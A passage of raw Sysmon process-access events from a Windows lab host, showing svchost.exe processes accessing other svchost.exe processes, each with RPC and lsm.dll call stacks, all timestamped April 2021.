1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292225Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292224Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292223Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292222Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292221Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292220Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292219Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292218Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292217Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292216Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292215Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292214Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292213Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292212Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292211Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292210Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292209Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23e0b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292208Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292207Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292206Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292205Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292204Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292203Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292202Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292201Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 